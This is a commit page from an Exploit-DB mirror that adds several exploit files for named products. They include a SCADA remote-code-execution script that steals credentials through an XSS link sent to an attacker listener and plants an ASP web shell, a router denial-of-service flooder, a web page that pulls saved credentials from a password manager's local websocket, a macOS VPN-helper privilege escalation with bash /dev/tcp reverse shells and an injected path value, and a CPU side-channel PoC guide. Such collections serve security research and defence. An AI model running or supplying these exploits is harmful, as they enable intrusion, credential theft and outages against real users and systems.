bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-11-06

Browse source 
13 changes to exploits/shellcodes

Softros LAN Messenger 9.2 - Denial of Service (PoC)
Microsoft Internet Explorer 11 - Null Pointer Dereference
LiquidVPN 1.36 / 1.37 - Privilege Escalation
Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel
SiAdmin 1.1 - 'id' SQL Injection
Advantech WebAccess SCADA 8.3.2 - Remote Code Execution
WebVet 0.1a - 'id' SQL Injection
Virgin Media Hub 3.0 Router - Denial of Service (PoC)
Poppy Web Interface Generator 0.8 - Arbitrary File Upload
Mongo Web Admin 6.0 - Information Disclosure
PHP Proxy 3.0.3 - Local File Inclusion
Royal TS/X - Information Disclosure
Voovi Social Networking Script 1.0 - 'user' SQL Injection
This commit is contained in:
Offensive Security 2018-11-06 05:01:40 +00:00
parent 0f49f84ff4
commit 363500a603
14 changed files with 1579 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

303
exploits/asp/webapps/45774.py Executable file
View file

@ -0,0 +1,303 @@
# Exploit Title: Advantech WebAccess SCADA 8.3.2 - Remote Code Execution
# Date: 2018-11-02
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: http://www.advantech.com
# Device: NRVMini2
# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-1MDG1BH
# Version: 8.3.2
# Tested on: Windows Server 2008 R2
# CVE: CVE-2018-15705, CVE-2018-15707
# TRA: https://www.tenable.com/security/research/tra-2018-35
# Description:
#
# This code exploits two vulnerabilities to gain remote code execution
# with Administrator privileges:
#
# 1) CVE-2018-15707 to steal credentials (XSS). User-interaction required.
# 2) CVE-2018-15705 to write an ASP file to the server.
from http.server import HTTPServer, BaseHTTPRequestHandler
from base64 import decodestring
import re
import requests, urllib, json
import sys
import argparse
TIMEOUT = 5 # sec
def err_and_exit(msg):
print '\n\nERROR: ' + msg + '\n\n'
sys.exit(1)
# WADashboard client
class WsClient:
def __init__(self, ip, port, https=False):
self.ip = ip
self.port = port
self.https = https
self.endpoint = 'https' if https else 'http'
self.endpoint += '://' + ip + ':' + str(port)
self.endpoint += '/WADashboard'
# see if service is up
def grab_projects(self):
url = self.endpoint + '/api/dashboard/v6/waConfig/getWebAccessProjectList'
r = requests.get(url, timeout=TIMEOUT)
if "resString" in r.text:
json_decoded = json.loads(r.text)
if json_decoded['resString'] is not None and len(json_decoded['resString']) > 0:
return json_decoded['resString']
return None
# success if we get cookies
def login(self, projectName, user, pw):
# issue a login request and set the cookies
# POST /WADashboard/login?cont=dashboardViewer
# projectName1=myproject&username=admin&password=hello&recId=
url = self.endpoint + '/login?cont=dashboardViewer'
data = {
'projectName1' : projectName,
'username' : user,
'password' : pw,
'recId' : ''
}
r = requests.post(url, data, timeout=TIMEOUT)
if len(r.cookies) > 0:
self.cookies = r.cookies
return True # success
else:
return False # fail
def write_file(self, filename, contents):
# /WADashboard/api/dashboard/v1/files/writeFile?projectSpecies=myproject!savedConfiguration&folderpath=../../../../exec.asp&msg=contents&overwrite=true
# post the writeFile request
# for some reason, the data is required in the query string instead of POST data
url = self.endpoint + '/api/dashboard/v1/files/writeFile'
data = {
'projectSpecies' : victim['project'] + '!savedConfiguration',
'folderpath' : '../../../../' + filename, # uploads to /Broadweb/ folder
'msg' : contents,
'overwrite' : 'true'
}
url += '?' + urllib.urlencode(data)
r = requests.post(url, cookies=self.cookies, timeout=TIMEOUT)
return (r.status_code == 200)
# This class will serve as an HTTP listener
class MyWebHandler(BaseHTTPRequestHandler):
def do_GET(self):
data = self.path.replace('/', '') # remove leading slash
decoded = decodestring(data)
print "\n***LINK CLICKED!***"
try:
# carve out the piece we want to match
i = decoded.index('logOnWebService')
k = decoded.index('readNodeStatus')
chunk = decoded[i:k]
# find our match
regex = '^logOnWebService\\("(.+)", "(.*)"\\);.*'
m = re.match(regex, chunk)
if not m:
err_and_exit("Couldn't extract credentials...")
print "\nCredentials stolen..."
user = m.group(1)
pw = m.group(2)
print "- User: " + user
print "- Pass: " + pw
# login to WADashboard
if not client.login(victim['project'], user, pw):
err_and_exit("Credentials didn't work...")
print '\nLogged into WADashboard with credentials.'
# write malicious ASP file
asp_payload = '<% Set t=Server.CreateObject("webdobj.webdraw"):t.RemoteWinExec Request.QueryString("p"),Request.QueryString("n"),Request.QueryString("c"):Response.Write "Done."%>'
filename = 'exec.asp'
if not client.write_file(filename, asp_payload):
err_and_exit("Write file failed...")
print "\n'" + filename + "' written to disk."
# execute OS command
url = broadweb_root + '/' + filename
data = {
'p' : victim['project'],
'n' : victim['node'],
'c' : victim['cmd']
}
url += '?' + urllib.urlencode(data)
r = requests.get(url, timeout=TIMEOUT) # no cookie needed
if r.status_code == 200:
print "\nSuccessful request to '" + url + "'\n"
else:
print "\nThere may be something wrong with the ASP payload.\n"
print "\nDone!"
except Exception as e:
print "Exception encountered: " + str(e)
msg = 'hello poppet'
self.send_response(200)
self.end_headers()
self.wfile.write(str.encode(msg))
# MAIN
# deal with command line flags
desc = '''This exploit targets Advantech WebAccess/SCADA 8.3.2. It has been tested against Windows 2008 R2 x64.
The goal of the script is to execute code remotely. User interaction is required.
The following operations will be conducted:
1) Ensure WebAccess application is running. (TCP port 80 by default)
2) Ensure WADashboard is running. (TCP port 8081 by default)
3) Ensure user-specified project exists.
4) Ensure user-specified node exists.
5) Generate malicious link to send to victim user. (exploits CVE-2018-15707 to steal credentials via XSS)
6) Start HTTP listener to receive credentials when victim clicks the link.
7) Login to WADashboard.
8) Write a malicious ASP file to the root of the WebAccess application. (exploits CVE-2018-15705)
Note: elevated privileges will be obtained using the Webdraw RemoteWinExec function.
9) Execute user-specified command.
Example (equivalent) commands:
python script.py -t 192.168.0.2 -p1 80 -p2 8081 -https false -proj myproject -node mynode -ip 192.168.0.3 -port 9999 -cmd calc.exe
python script.py -t 192.168.0.2 -proj myproject -node mynode -ip 192.168.0.3 -cmd calc.exe
'''
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Target IP (Required)')
arg_parser.add_argument('-p1', type=int, default=80, help='WebAccess Port (Default: 80)')
arg_parser.add_argument('-p2', type=int, default=8081, help='WADashboard Port (Default: 8081)')
arg_parser.add_argument('-https', type=bool, default=False, help='HTTPS (Default: false)')
arg_parser.add_argument('-proj', required=True, help='Project name')
arg_parser.add_argument('-node', required=True, help='Node name')
arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')
arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')
arg_parser.add_argument('-cmd', required=True, help='OS command to be executed')
args = arg_parser.parse_args()
# victim settings
victim = dict()
victim['ip'] = args.t
victim['web_port'] = args.p1 # Broadweb web app port
victim['ws_port'] = args.p2 # WADashboard Node.js service port
victim['https'] = args.https
victim['project'] = args.proj
victim['node'] = args.node
victim['cmd'] = args.cmd
# listener settings
listener = dict()
listener['ip'] = args.ip
listener['port'] = args.port
# validate IP addresses
ip_pattern = "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+"
for ip in [victim['ip'], listener['ip']]:
match = re.match(ip_pattern, ip)
if match is None:
print "\nError: IP Address is invalid: '" + ip + "'.\n"
arg_parser.print_help()
sys.exit(1)
# start the real work
# ensure WebAccess ASP application is running
print "\nPerforming some banner checks to ensure services are running...\n"
proto = 'https' if victim['https'] else 'http'
broadweb_root = proto + '://' + victim['ip']
# no need to add port if it's 80 or 443
https = victim['https']
if (https and victim['web_port'] != 443) or (victim['web_port'] != 80 and not https):
broadweb_root += ':' + str(victim['web_port'])
broadweb_root += '/broadWeb'
url = broadweb_root + '/bwRoot.asp'
try:
r = requests.get(url, timeout=TIMEOUT)
except requests.exceptions.ConnectionError as e:
err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['web_port']))
if 'Welcome to Advantech WebAccess' not in r.text:
err_and_exit('WebAccess not found.')
print 'WebAccess is up.'
# ensure WADashboard Node.js service is running
# and projects are defined
client = WsClient(victim['ip'], victim['ws_port'], https=https)
try:
projects = client.grab_projects()
except requests.exceptions.ConnectionError as e:
err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['ws_port']))
if not projects:
err_and_exit('Dashboard Viewer not found.')
print "Dashboard Viewer is up."
if len(projects) == 0:
err_and_exit("No projects found...")
print "\nFound projects: "
for project in projects:
print " - " + project
# ensure specified project exists
if victim['project'] not in projects:
err_and_exit("Specified project, " + victim['project'] + " was not found...")
print "Specified project '" + victim['project'] + "' exists."
# ensure nodes are defined for project
# we have to specify a node name to run the custom RemoteWinExec() function
url = broadweb_root + '/' + victim['project'] +'.dpj'
r = requests.get(url, timeout=TIMEOUT)
node_list = list()
if "[nodelist]" in r.text:
for line in r.text.split('\n'):
regex = "^node[0-9]=(.*)$"
m = re.match(regex, line, flags=re.MULTILINE)
if m:
node_list.append(m.group(1).strip())
if len(node_list) == 0:
err_and_exit("No nodes found...")
print "\nFound nodes: "
for node in node_list:
print ' - ' + node
if victim['node'] not in node_list:
err_and_exit("Node, " + victim['node'] + " not in node list...")
print "Specified node '" + victim['node'] + "' exists."
# generate link to send to victim
print "\nSend this link to the victim:"
print "Keep in mind, they could be logged in via localhost."
link = broadweb_root + '/bwmainleft.asp?pid=1&pname=");i=document.createElement(\'img\');'
link += 'i.src="http://' + listener['ip'] + ':' + str(listener['port']) + '/'
link += '"%2bbtoa(document.getElementsByTagName(\'script\')[4].text);//'
print link
# start listener
print "\nListening on " + listener['ip'] + ":" + str(listener['port'])
print "Waiting for victim to click link..."
httpd = HTTPServer((listener['ip'], listener['port']), MyWebHandler)
httpd.handle_request()

122
exploits/hardware/local/45785.md Normal file
View file

@ -0,0 +1,122 @@
# Summary
This is a proof-of-concept exploit of the PortSmash microarchitecture attack, tracked by CVE-2018-5407.
![Alt text](parse_raw_simple.png?raw=true "Title")
# Setup
## Prerequisites
A CPU featuring SMT (e.g. Hyper-Threading) is the only requirement.
This exploit code should work out of the box on Skylake and Kaby Lake. For other SMT architectures, customizing the strategies and/or waiting times in `spy` is likely needed.
## OpenSSL
Download and install OpenSSL 1.1.0h or lower:
cd /usr/local/src
wget https://www.openssl.org/source/openssl-1.1.0h.tar.gz
tar xzf openssl-1.1.0h.tar.gz
cd openssl-1.1.0h/
export OPENSSL_ROOT_DIR=/usr/local/ssl
./config -d shared --prefix=$OPENSSL_ROOT_DIR --openssldir=$OPENSSL_ROOT_DIR -Wl,-rpath=$OPENSSL_ROOT_DIR/lib
make -j8
make test
sudo checkinstall --strip=no --stripso=no --pkgname=openssl-1.1.0h-debug --provides=openssl-1.1.0h-debug --default make install_sw
If you use a different path, you'll need to make changes to `Makefile` and `sync.sh`.
# Tooling
## freq.sh
Turns off frequency scaling and TurboBoost.
## sync.sh
Sync trace through pipes. It has two victims, one of which should be active at a time:
1. The stock `openssl` running `dgst` command to produce a P-384 signature.
2. A harness `ecc` that calls scalar multiplication directly with a known key. (Useful for profiling.)
The script will generate a P-384 key pair in `secp384r1.pem` if it does not already exist.
The script outputs `data.bin` which is what `openssl dgst` signed, and you should be able to verify the ECDSA signature `data.sig` afterwards with
openssl dgst -sha512 -verify secp384r1.pem -signature data.sig data.bin
In the `ecc` tool case, `data.bin` and `secp384r1.pem` are meaningless and `data.sig` is not created.
For the `taskset` commands in `sync.sh`, the cores need to be two logical cores of the same physical core; sanity check with
$ grep '^core id' /proc/cpuinfo
core id : 0
core id : 1
core id : 2
core id : 3
core id : 0
core id : 1
core id : 2
core id : 3
So the script is currently configured for logical cores 3 and 7 that both map to physical core 3 (`core_id`).
## spy
Measurement process that outputs measurements in `timings.bin`. To change the `spy` strategy, check the port defines in `spy.h`. Only one strategy should be active at build time.
Note that `timings.bin` is actually raw clock cycle counter values, not latencies. Look in `parse_raw_simple.py` to understand the data format if necessary.
## ecc
Victim harness for running OpenSSL scalar multiplication with known inputs. Example:
./ecc M 4 deadbeef0123456789abcdef00000000c0ff33
Will execute 4 consecutive calls to `EC_POINT_mul` with the given hex scalar.
## parse_raw_simple.py
Quick and dirty hack to view 1D traces. The top plot is the raw trace. Everything below is a different digital filter of the raw trace for viewing purposes. Zoom and pan are your friends here.
You might have to adjust the `CEIL` variable if the plots are too aggressively clipped.
Python packages:
sudo apt-get install python-numpy python-matplotlib
# Usage
Turn off frequency scaling:
./freq.sh
Make sure everything builds:
make clean
make
Take a measurement:
./sync.sh
View the trace:
python parse_raw_simple.py timings.bin
You can play around with one victim at a time in `sync.sh`. Sample output for the `openssl dgst` victim is in `parse_raw_simple.png`.
# Credits
* Alejandro Cabrera Aldaya (Universidad Tecnológica de la Habana (CUJAE), Habana, Cuba)
* Billy Bob Brumley (Tampere University of Technology, Tampere, Finland)
* Sohaib ul Hassan (Tampere University of Technology, Tampere, Finland)
* Cesar Pereida García (Tampere University of Technology, Tampere, Finland)
* Nicola Tuveri (Tampere University of Technology, Tampere, Finland)
EDB Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45785.zip

101
exploits/hardware/webapps/45776.py Executable file
View file

@ -0,0 +1,101 @@
# Exploit Title: Virgin Media Hub 3.0 Router - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2018-11-03
# Exploit Author: Ross Inman
# Vendor Homepage: https://www.broadbandchoices.co.uk/guides/hardware/virgin-media-broadband-routers
# Software Link: N/A
# Version: Virgin Media Hub 3.0
# Tested on: Linux
# CVE : N/A
#!/usr/bin/python2.7
import socket, sys, random, os
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
]
def connection(ip,port):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(1)
test = s.connect_ex((ip,port))
s.close()
if(test == 0):
return True
else:
return False
def dos(ip,port):
socks = []
payload = """
POST / HTTP/1.1\
Host: {}
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: {}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
""".format(ip,random.choice(user_agents))
with open("/tmp/payload.txt","w") as f:
f.write(payload)
f.close()
with open("/tmp/payload.txt","r") as f:
lines = f.readlines()
f.close()
os.remove("/tmp/payload.txt")
while(True):
try:
sys.stdout.write("\r[Info]Sending packets => {}".format(ip))
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,port))
for line in lines:
s.send(line)
socks.append(s)
except KeyboardInterrupt:
print"\n[Info]Closing connections..."
for sock in socks:
sock.close()
socks.remove(sock)
sys.exit(0)
def main():
if(len(sys.argv) != 3):
sys.exit("Usage: ./dos.py {target ip} {port}")
else:
target = sys.argv[1]
port = int(sys.argv[2])
print"[Info]Checking connection to target..."
check = connection(target,port)
if(not check):
sys.exit("[Failure]Connection to target failed.")
print"[Info]Starting attack on: {}".format(target)
dos(target,port)
if(__name__ == "__main__"):
main()

126
exploits/json/webapps/45783.html Normal file
View file

@ -0,0 +1,126 @@
<!--
Title: Royal TS/X - Information Disclosure
Author: Jakub Palaczynski
Date: 10. July 2018
CVE: CVE-2018-18865
Affected product:
=============
Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta
Vulnerability - Information Disclosure:
=============================
Any third party web application can steal credentials created in Royal TS/X
when browser extension is enabled.
Browser extension communicates using websockets (default TCP port 54890)
and websockets do not use any validation to verify origin of the request.
PoC website:
==========
-->
<!DOCTYPE html>
<meta charset="utf-8" />
<title>RoyalTS/X Exploit</title>
<script language="javascript" type="text/javascript">
var wsUri = "ws://127.0.0.1:54890/";
var output;
function init()
{
output = document.getElementById("output");
testWebSocket();
}
function testWebSocket()
{
writeToScreen("Let's retrieve some data...");
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetDocuments\",\"Arguments\":null,\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
websocket.onclose = function(evt) { onClose(evt) };
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}
function onOpen(evt,message)
{
doSend(message);
}
function onClose(evt)
{
}
function onMessage(evt)
{
var obj = JSON.parse(evt.data);
if (obj['Command'] == "GetDocuments") {
for (var x in obj['ResponseData']){
writeToScreen("Name: " + obj['ResponseData'][x]['Name']);
writeToScreen("Unlocked: " + obj['ResponseData'][x]['Unlocked']);
for (var y in obj['ResponseData'][x]['Credentials']){
writeToScreen("Username: " +
obj['ResponseData'][x]['Credentials'][y]['UserName']);
writeToScreen("URL: " + obj['ResponseData'][x]['Credentials'][y]['URL']);
if (obj['ResponseData'][x]['Unlocked'] == true){
websocket.close();
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetLoginInformation\",\"Arguments\":{\"CredentialId\":\""
+ obj['ResponseData'][x]['Credentials'][y]['ID'] +
"\"},\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
websocket.onclose = function(evt) { onClose(evt) };
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}
}
}
}
else {
if (obj['Command'] == "GetLoginInformation") {
var obj = JSON.parse(evt.data);
writeToScreen("AutoFill Data: " + atob(obj['ResponseData']));
}
}
}
function onError(evt)
{
writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data);
}
function doSend(message)
{
websocket.send(message);
}
function writeToScreen(message)
{
var pre = document.createElement("p");
pre.style.wordWrap = "break-word";
pre.innerHTML = message;
output.appendChild(pre);
}
window.addEventListener("load", init, false);
</script>
<h2>RoyalTS/X Exploit</h2>
<div id="output"></div>
<!--
Contact:
=======
Jakub[dot]Palaczynski[at]gmail[dot]com
-->

312
exploits/macos/local/45782.c Normal file
View file

@ -0,0 +1,312 @@
/*
=======================================================================
Title: Multiple Privilege Escalation Vulnerabilities
Product: LiquidVPN for MacOS
Vulnerable versions: 1.37, 1.36 and earlier
CVE ID(s): CVE-2018-18856, CVE-2018-18857, CVE-2018-18858, CVE-2018-18859
Impact: Critical
Homepage: https://www.liquidvpn.com
Identified: 2018-09-29
By: Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================
Vendor description:
-------------------
"LiquidVPN creates a secure encrypted link between your device and the
Internet.
When you connect to the Internet from your home, mobile device, office or a
WiFi
hotspot with encryption your traffic cant be monitored by 3rd parties like
your
ISP. Without encryption, your ISP can store information about the websites
you
use and sell that data to anyone willing to pay for it. Some ISPs even
inject
advertisements into web pages to further profit off of the Internet service
you
pay for."
Source: https://www.liquidvpn.com
Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker
can fully compromise a MacOS system with an installation of the LiquidVPN
client.
Users are urged to uninstall the application until the vendor ships a new
version
of the LiquidVPN client.
Vulnerability overview/description:
-----------------------------------
LiquidVPN installs the helper tool "com.smr.liquidvpn.OVPNHelper" for
performing
privileged (root) actions. In order to allow other LiquidVPN components to
send
messages to the helper tool, it implements an XPC service. Static code
analysis
showed, that the XPC service does not filter incoming messages. This means,
regular users (local attackers) can craft arbitrary XPC messages and send
them
to the service. This leads to the following issues:
1) "anycmd" Privilege Escalation (reserved CVE-2018-18857)
After receiving a message, the service checks for the existence of the
"anycmd" parameter:
============================================================================================
...
__text:00000001000012E8 lea rsi, aAnycmd ; "anycmd"
__text:00000001000012EF mov rdi, r14 ; char *
__text:00000001000012F2 call _strcmp
__text:00000001000012F7 test eax, eax
__text:00000001000012F9 jnz loc_1000016C2
__text:00000001000012FF mov [rbp+var_10A38], r15
__text:0000000100001306 lea rsi, aCommandLine ;
"command_line"
__text:000000010000130D mov rdi, rbx
...
__text:0000000100001336 lea rsi, aR ; "r"
__text:000000010000133D mov rdi, r14 ; char *
__text:0000000100001340 call _popen
...
============================================================================================
If "anycmd" is found, the "command_line" parameter is extracted from the
message
and directly passed on to a call to popen() as an argument.
2) "openvpncmd" Privilege Escalation (reserved CVE-2018-18856)
Similar to the previous vulnerability, the service checks if the "openvpn"
parameter exists. If it does, the "openvpncmd" parameter is extracted and
passed
on to a system() call as an argument:
============================================================================================
...
__text:00000001000013F1 lea rsi, aOpenvpncmd ;
"openvpncmd"
__text:00000001000013F8 mov rdi, rbx
__text:00000001000013FB call _xpc_dictionary_get_string
...
__text:000000010000166A mov rdi, r15 ; char *
__text:000000010000166D call _system
__text:0000000100001672 lea rsi, aReply ; "reply"
__text:0000000100001679 lea rdx, aOpenvpnCommand ;
"openvpn command executed (ver 3)"
__text:0000000100001680 mov rdi, r12
__text:0000000100001683 call _xpc_dictionary_set_string
...
============================================================================================
3) OS Command Injection (reserved CVE-2018-18858)
If the service detects the "openvpn" parameter in a message, it also checks
if
the parameters "tun_path" or "tap_path" exist. If one of them (or both)
are found,
the values are used as source paths for a copy process using the system()
function.
However, the paths are not sanitized before being passed to system():
============================================================================================
...
__text:00000001000013CD lea rsi, aPathTun ; "path_tun"
__text:00000001000013D4 mov rdi, rbx
__text:00000001000013D7 call _xpc_dictionary_get_string
__text:00000001000013DC mov r14, rax
__text:00000001000013DF lea rsi, aPathTap ; "path_tap"
__text:00000001000013E6 mov rdi, rbx
__text:00000001000013E9 call _xpc_dictionary_get_string
...
__text:000000010000143F call _strcat
__text:0000000100001444 mov rdi, rbx ; char *
__text:0000000100001447 call _strlen
...
__text:0000000100001497 mov rdi, rbx ; char *
__text:000000010000149A call _system
..
============================================================================================
4) Loading of arbitrary Kernel Extensions (reserved CVE-2018-18859)
The previous vulnerability can also be used to directly install an arbitrary
kernel extension. When the client is installed, "tun_path" and "tap_path"
are
pointed to the application folder for installing
"/Applications/LiquidVPN.app/Contents/Resources/tun.kext" and
"/Applications/LiquidVPN.app/Contents/Resources/tap.kext".
By crafting an XPC message containing attacker controlled kernel extension
paths,
the helper tool installs the kernel extensions using a call to the system
function
kextload(). Note: Since MacOS 10.13, a Kext needs to be signed. In
adddition to that,
Apple introduced user-approval for installing third party kernel
extensions. However,
as an attacker has local access to the system and user-approval does not
require the
user to enter a root or admin password, this is not a problem.
Proof of concept:
-----------------
The following proof of concepts can be used to execute arbitrary system
commands:
1) "anycmd" Privilege Escalation
============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "anycmd");
xpc_dictionary_set_bool(message, "blocking", FALSE);
xpc_dictionary_set_string(message, "command_line", "[ARBITRARY CMD]");
...
============================================================================================
2) "openvpncmd" Privilege Escalation
============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "openvpncmd", "[ARBITRARY CMD]");
...
============================================================================================
3) OS Command Injection
============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;[ARBITRARY
CMD]");
...
============================================================================================
4) Loading of arbitrary Kernel Extensions
============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "[PATH TO KEXT]");
...
============================================================================================
Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable:
1.37 (most recent) and 1.36.
Earlier versions might be vulnerable as well.
Vendor contact timeline:
------------------------
2018-10-04: Requested security contact via twitter @LiquidVPN
2018-10-11: Contacted vendor through dave@liquidvpn.com
2018-10-11: Sent PGP encrypted advisory (
https://my.liquidvpn.com/canary/syswan)
2018-10-17: Requested status update from vendor
2018-10-30: Sent new contact details & public PGP key to dave@liquidvpn.com
2018-10-30: Received vendor notification:
No patches will be issued as the LiquidVPN client for MacOS
will be
replaced by new app in the future
2018-10-31: Published to Full Disclosure Mailing List
Solution:
---------
None.
Workaround:
-----------
None.
EOF B. Leitner / @2018
*/
// start netcat listener on port 9999
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <xpc/xpc.h>
void what(const char *bin) {
printf("%s <1-4>\n", bin);
printf("[1] Privesc (local reverse shell on port 9999 via \"anycmd\")\n");
printf("[2] Privesc (local reverse shell on port 9999 via \"openvpncmd\")\n");
printf("[3] Privesc (local reverse shell on port 9999 via OS command injection)\n");
printf("[4] KEXT (load arbitrary kernel extension from /tmp/tun.kext (has to be signed for MacOS >= 10.13))\n");
}
int main(int argc, const char *argv[]) {
if (argc == 1 || argc > 2) {
what(argv[0]);
return 0;
}
int option = atoi(argv[1]);
xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0);
switch(option) {
case 1:
// "anycmd"
xpc_dictionary_set_string(message, "cmd", "anycmd");
xpc_dictionary_set_bool(message, "blocking", FALSE);
xpc_dictionary_set_string(message, "command_line", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1");
break;
case 2:
// "openvpncmd"
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "openvpncmd", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1");
break;
case 3:
// cmd injection via "path_tun". "path_tap" is affected by the same bug
mkdir("/tmp/__dummy00_", 0755);
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;bash -i >& /dev/tcp/127.0.0.1/9999 0>&1;cat");
rmdir("/tmp/__dummy00_");
break;
case 4:
// load arbitrary kext via "path_tun". "path_tap" is affected by the same bug
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "/tmp/tun.kext");
break;
default:
what(argv[0]);
return 0;
}
printf("[+] sending xpc message.\n");
xpc_connection_t connection = xpc_connection_create_mach_service("com.smr.liquidvpn.OVPNHelper", NULL, 0);
if (connection == NULL) {
printf("[-] connection to xpc service failed.\n");
return 1;
}
xpc_connection_set_event_handler(connection, ^(xpc_object_t e) {
// we don't need that here.
});
xpc_connection_resume(connection);
printf("[+] check your listener.\n");
xpc_object_t result = xpc_connection_send_message_with_reply_sync(connection, message);
printf("[+] bye.\n");
return 0;
}

59
exploits/php/webapps/45773.txt Normal file
View file

@ -0,0 +1,59 @@
# Exploit Title: SiAdmin 1.1 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-11-04
